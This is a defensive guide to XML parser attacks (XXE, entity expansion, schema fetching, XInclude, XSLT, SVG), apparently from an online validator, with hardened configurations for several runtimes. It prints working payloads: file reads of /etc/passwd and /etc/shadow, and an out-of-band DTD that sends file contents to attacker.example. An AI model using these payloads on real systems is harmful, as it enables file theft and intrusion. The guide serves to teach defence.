XML security risks

XML is not a data format in the way JSON is a data format. It is a document format with a macro system, an inclusion mechanism and a schema language attached, and a parser handed a hostile document is being asked to execute a small program on the attacker's behalf. Every attack below comes from a feature the specification defines and the parser enables because nobody told it not to.

The uncomfortable part is how many of these are on by default. Java's DocumentBuilderFactory will resolve a file:// entity out of the box. PHP before 8.0 needed an explicit call to close the same hole. Most production XML parsing runs on defaults, and the defaults were set when the documents were trusted.

#What XML has that JSON does not

A JSON parser reads bytes and produces values. It has no construct that refers to anything outside the text it was given. XML 1.0 (Fifth Edition) section 4 defines a whole physical layer on top of the logical one: a document is composed of entities, an entity may be internal (literal replacement text) or external (a SYSTEM or PUBLIC identifier), and section 4.4 sets out when a processor is permitted or required to dereference the external ones. A validating processor must include external entities. A non-validating one may.

That one decision produces most of the attack surface. The rest comes from features layered on later: XInclude, XML Schema, XSLT, and the fact that SVG is XML a browser will execute. The classes worth knowing:

  • XXE: an external entity reads a local file, or reaches a host the attacker cannot.
  • Entity expansion: a kilobyte of declarations that becomes gigabytes of text.
  • Quadratic blowup: one large entity referenced tens of thousands of times, which defeats any defence based on nesting depth.
  • Schema fetching: xsi:schemaLocation or an xs:import pointing at an attacker URL, followed during validation.
  • XInclude: a file read that is not a DTD, so blocking the DOCTYPE does not stop it.
  • XSLT: a stylesheet is a program, and several processors let it call the host language.
  • SVG: markup that scripts, executed by browsers, uploaded by users.

#XXE: external entities, file reads and SSRF

The classic form is four lines. The parser sees a general entity declared with a SYSTEM identifier, dereferences it, and splices the result into the document where the reference appears.

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
The canonical XXE payload. Nothing here is malformed.

The URI scheme decides what the attack does. file:// reads a file. http://10.0.0.1:8080/ turns your parser into a proxy for internal hosts and, because a connection refused fails differently from a connection accepted, into a port scanner. On PHP, php://filter/convert.base64-encode/resource=config.php base64-encodes source code so it survives the parse. On older Java runtimes, netdoc:// and jar:file:// read paths and archive members that file:// alone would not reach.

One practical constraint shapes real exploits: the retrieved content is spliced into an XML document, so a file containing a literal < or & breaks well-formedness and the parse fails before anything is returned. That is why /etc/passwd is the standard demo and why attackers reach for base64 filters or CDATA-wrapping tricks for anything structured.

The blind, or out-of-band, variant is the one worth understanding properly, because the defence against it is a different flag. If the response never echoes the document back, the data has to leave over a channel the attacker controls. That needs an entity whose declaration is built from another entity, and XML 1.0 forbids exactly that in the internal subset: WFC: PEs in Internal Subset says a parameter-entity reference may not appear inside a markup declaration there. So the payload has to be hosted externally, which means the attack depends on external parameter entities specifically.

<!-- the document sent to the target -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
  %dtd;
]>
<foo/>

<!-- evil.dtd, served by the attacker -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.example/?d=%file;'>">
%eval;
%exfil;
Out-of-band XXE. The document is trivial; the payload is in the fetched DTD.

The &#x25; is a percent sign written as a character reference so that the inner declaration is not expanded while %eval; is being defined. Disabling external parameter entities kills this exfiltration path and leaves the direct file read intact; disabling the DOCTYPE outright kills both. There is also an error-based variant, where the stolen file is fed to a SYSTEM identifier that does not exist and leaks out through the parser's own error message, and a version that needs no entity at all: a DOCTYPE with a SYSTEM identifier is itself a fetch.

#Entity expansion and the other DTD bombs

Entities do not have to point anywhere to be dangerous. WFC: No Recursion forbids an entity that refers to itself, but nesting is not recursion, and ten levels of tenfold nesting produce a billion expansions from under a kilobyte of input. That is the billion laughs attack, and it has its own guide at /guides/billion-laughs-attack/ with the full payload, the arithmetic and the per-runtime limits.

The variant that matters for defensive design is quadratic blowup, because it defeats every heuristic based on nesting depth or entity count. One entity, one hundred thousand characters of value, referenced one hundred thousand times from the body. Nothing is nested. Nothing recurses. Roughly 800 KB of input becomes 10 GB of output.

Depth-based defence, which this walks past
if (entityNestingDepth > 20) reject();
// The quadratic payload has a nesting depth of one.
Amplification-based defence, which catches both shapes
// Compute expanded output from the declarations, then charge
// every reference in the body against the same budget.
if (expandedBytes > budget) reject();

Two more DTD-shaped denial of service tricks are worth knowing. An external entity pointing at file:///dev/random or file:///dev/zero never terminates, so a parser that will resolve external entities can be hung with one line. And a decompression bomb wrapped in a SOAP attachment or an HTTP gzip response is inflated before the parser ever sees it, so size limits applied after decompression are applied too late.

#Schemas and XInclude: fetches that survive a DOCTYPE ban

Blocking the DOCTYPE is the strongest single defence, which is exactly why the next two attacks do not use one.

A document can nominate its own schema. xsi:noNamespaceSchemaLocation and xsi:schemaLocation are attributes in the http://www.w3.org/2001/XMLSchema-instance namespace, and a validator configured to honour them will fetch whatever URL they name. The schema is then itself parsed as XML, so an xs:import or xs:include inside it fetches again, and a DOCTYPE inside the schema is a second chance at XXE against a parser that was hardened only on the document path.

<?xml version="1.0"?>
<order xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:noNamespaceSchemaLocation="http://attacker.example/order.xsd">
  <id>1</id>
</order>
No DOCTYPE, and still a request to a host of the attacker's choosing.

In Java, setting XMLConstants.ACCESS_EXTERNAL_SCHEMA to the empty string refuses every external schema reference. The general rule: load schemas from a path you control and compile them once, never from the instance document.

XInclude is the sharper of the two. XInclude 1.0 defines an xi:include element in the http://www.w3.org/2001/XInclude namespace whose href attribute names a resource to splice in. With parse="text" the target is not parsed as XML at all, so unlike an external entity it can pull in a file containing angle brackets, ampersands, or binary. It is not a DTD, so disallow-doctype-decl does nothing about it. Java's DocumentBuilderFactory is not XInclude-aware by default, but plenty of frameworks turn it on; libxml2 processes XInclude only when XML_PARSE_XINCLUDE is set or xmllint is run with --xinclude.

<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/shadow" parse="text"/>
</root>
An arbitrary file read with no entity and no DOCTYPE.

#XSLT runs code, and SVG is XML the browser executes

A stylesheet is not configuration. XSLT 1.0 is a Turing-complete language, and section 12.1 defines a document() function whose whole job is to read another XML resource by URI. Accepting a stylesheet from a user is accepting code, and several processors extend that code with reach into the host runtime: Xalan and Saxon can be configured to call Java methods reflectively, PHP's XSLTProcessor::registerPHPFunctions() lets a stylesheet call arbitrary PHP functions, and XSLT 2.0's xsl:result-document writes files. There is no safe way to run an untrusted stylesheet with extensions enabled.

import javax.xml.XMLConstants;
import javax.xml.transform.TransformerFactory;

TransformerFactory tf = TransformerFactory.newInstance();

// Disables extension functions and enforces the JAXP processing limits.
tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

// Refuse every external DTD and every external stylesheet reference,
// which is what closes document() and xsl:import. JAXP 1.5 and later.
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
The three settings that make a Java TransformerFactory safe to point at input you did not write.

SVG is the case that bites teams who never think of themselves as processing XML. An SVG file is an XML document, and it may contain a script element, event handler attributes such as onload, and a foreignObject carrying HTML. Whether that code runs depends entirely on how the file is loaded. Referenced from an img element or a CSS background it does not execute. Navigated to directly, or embedded through object, embed or iframe, it does, in the origin that served it. An avatar upload served from your main domain is therefore stored cross-site scripting with extra steps.

  • Serve user SVG from a separate origin, or with Content-Disposition: attachment, so nothing runs against your session cookies.
  • Sanitise with an allowlist of elements and attributes, not a blocklist of script. Event handler attributes and javascript: URIs in href and xlink:href are what a blocklist misses.
  • The server side counts too: rasterisers and thumbnailers parse SVG as XML, so an SVG with a DOCTYPE is an XXE payload aimed at your image pipeline.

#The exact setting to change, by runtime

RuntimeBehaviour out of the boxWhat to set
Java DocumentBuilderFactory, SAXParserFactory, XMLInputFactoryDOCTYPE accepted, external general and parameter entities resolveddisallow-doctype-decl true, plus the two external-entity features
Python xml.etree, xml.sax, minidomExternal general entities not processed since 3.7.1; no expansion limits of its owndefusedxml as a drop-in replacement
Python lxmlresolve_entities defaults to True, no_network defaults to True, so a file:// read works and http:// exfiltration does notXMLParser(resolve_entities=False, no_network=True, load_dtd=False, huge_tree=False)
.NET XmlReaderDtdProcessing.Prohibit is already the defaultKeep it, and set XmlResolver = null on XmlDocument and XmlTextReader
PHP DOMDocument, SimpleXMLExternal entity loading off since libxml2 2.9; LIBXML_NOENT re-enables itNever pass LIBXML_NOENT or LIBXML_DTDLOAD; add LIBXML_NONET
libxml2 (C and WebAssembly)External entities off since 2.9, amplification cap since 2.11XML_PARSE_NO_XXE | XML_PARSE_NONET, and never XML_PARSE_HUGE
Go encoding/xmlDTD entity declarations are never processed at allNothing
What each runtime does before you touch it. The Java row is the one that catches people out.
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();

f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
f.setFeature("http://xml.org/sax/features/external-general-entities", false);
f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

// JAXP 1.5 and later. Empty string means "no protocol is permitted".
f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

f.setXIncludeAware(false);
f.setExpandEntityReferences(false);

var doc = f.newDocumentBuilder().parse(input);
Java. The first line does most of the work; the rest is for services that must accept a DOCTYPE.
# Standard library: replace the import and nothing else.
# Raises EntitiesForbidden, ExternalReferenceForbidden or DTDForbidden.
from defusedxml.ElementTree import fromstring
root = fromstring(data)

# lxml, where you need XPath or schema validation:
from lxml import etree

parser = etree.XMLParser(
    resolve_entities=False,  # the default is True
    no_network=True,         # the default is True, set it anyway
    load_dtd=False,
    huge_tree=False,
    recover=False,
)
root = etree.fromstring(data, parser)

# lxml 5.0 added resolve_entities="internal", which expands
# internal entities and refuses external ones.
Python. defusedxml raises rather than resolving; lxml needs the flags stated.
using System.Xml;

var settings = new XmlReaderSettings
{
    DtdProcessing = DtdProcessing.Prohibit,   // already the default, state it
    XmlResolver = null,                       // no fetch is ever attempted
    MaxCharactersFromEntities = 1_000_000,    // 0, the default, means no limit
    MaxCharactersInDocument = 20_000_000,
};

using var reader = XmlReader.Create(stream, settings);

// XmlDocument and XmlTextReader carried a resolver by default in older
// .NET Framework versions. Setting it to null is free where it is
// already null and load-bearing where it is not.
var doc = new XmlDocument { XmlResolver = null };
doc.Load(reader);
.NET. The modern defaults are good; the legacy APIs are where the holes are.
<?php
// PHP 7.x: the function exists and is the documented fix.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

// Works on every version: refuse to resolve anything at all.
libxml_set_external_entity_loader(
    static fn(?string $public, ?string $system, array $context) => null
);

$doc = new DOMDocument();
// LIBXML_NOENT is the flag that reintroduces XXE. Never pass it.
$doc->loadXML($xml, LIBXML_NONET);
PHP. libxml_disable_entity_loader() was deprecated in 8.0 because the underlying default changed.
xmlParserCtxtPtr ctxt = xmlNewParserCtxt();

/* Default is 5. Raise it only for trusted, entity-heavy corpora. */
xmlCtxtSetMaxAmplification(ctxt, 5);

/* XML_PARSE_NO_XXE requires libxml2 2.13. On older versions, simply
   omitting NOENT and DTDLOAD has the same effect. */
xmlDocPtr doc = xmlCtxtReadMemory(ctxt, buf, len, NULL, NULL,
                                  XML_PARSE_NO_XXE | XML_PARSE_NONET);

/* Never OR in XML_PARSE_HUGE: it relaxes the nesting and text-length
   limits and disables the amplification check. */

/* Shell equivalent. --noent is the dangerous one, not --nonet. */
/* xmllint --noout --nonet document.xml */
libxml2 directly, and the same thing from the command line.

#How this validator behaves

Everything here runs in your browser, so there is no server to read a file from, but the parser is written as though there were. External entity declarations and external DOCTYPE identifiers are reported with the system identifier they name and never fetched: no code path in the scanner makes a network request. Expansion cost is computed from the declaration graph before anything is expanded, and entity cycles are detected rather than followed.

Schema validation runs libxml2 compiled to WebAssembly with a fixed option mask of XML_PARSE_NO_XXE, XML_PARSE_NONET, XML_PARSE_NO_SYS_CATALOG and XML_PARSE_BIG_LINES. XML_PARSE_HUGE is deliberately absent, leaving libxml2's own limits in place: element depth 256, entity nesting depth 20, and the amplification cap. There is no toggle to turn that off. The SVG validator parses SVG as XML and never renders it.

Common questions

Is XXE still a real risk, or was it fixed years ago?

It was fixed in some places. libxml2 stopped loading external entities by default in 2.9, .NET's XmlReader has defaulted to DtdProcessing.Prohibit for years, and PHP 8.0 deprecated libxml_disable_entity_loader() precisely because the default underneath it had changed.

Java is the outlier that keeps the class alive. DocumentBuilderFactory, SAXParserFactory and XMLInputFactory all resolve external entities unless told otherwise, and the settings that stop them are verbose enough that they get copied into one service and forgotten in the next. Add the long tail of SOAP stacks, SAML processors, document converters and XML-driven build tools, and XXE findings are still routine.

What is the single change with the largest effect?

Refuse the DOCTYPE. In Java that is one line: setFeature("http://apache.org/xml/features/disallow-doctype-decl", true). In .NET it is DtdProcessing.Prohibit, which you already have.

That one setting removes external general entities, external parameter entities, out-of-band exfiltration and every form of entity expansion at once, because all of them are declared in a DTD. It does not touch XInclude, schema fetching or XSLT, which is why those need separate attention.

Does disabling DTDs break legitimate documents?

Rarely, in the kinds of traffic most services actually receive. SOAP prohibits DTDs outright, and RSS, Atom, sitemaps and the great majority of API payloads carry no internal subset.

It does break documentation formats. DocBook and DITA lean on entities heavily, and a build that processes them needs DTD support enabled. The answer there is to separate the trust boundaries: process authored content with a permissive parser inside your build, and process anything that arrived over the network with the DOCTYPE refused.

Are XML and JSON equally risky if I harden the parser?

Close, but not equal. An XML parser with DTDs refused, XInclude off and no schema fetching has much the same attack surface as a JSON parser: malformed input, deep nesting and large documents, all bounded by an input size limit.

The asymmetry is in what a missed setting costs. In a JSON parser it gets you a parse error. In an XML parser it gets you a file read. That is an argument about blast radius rather than about the formats, but it is why XML deserves a checklist and JSON does not.

Can uploaded SVG ever be made safe?

Yes, but not by validating it. An SVG containing a script element is perfectly well-formed XML and perfectly valid SVG, so no parser will object.

Safety comes from where you serve it and what you strip. A separate origin means any surviving script has no access to your session; Content-Disposition: attachment means it is never executed as a document. Then sanitise with an allowlist, which catches what a blocklist misses: event handler attributes, javascript: URIs in href and xlink:href, and HTML smuggled inside foreignObject.

Sources

Try it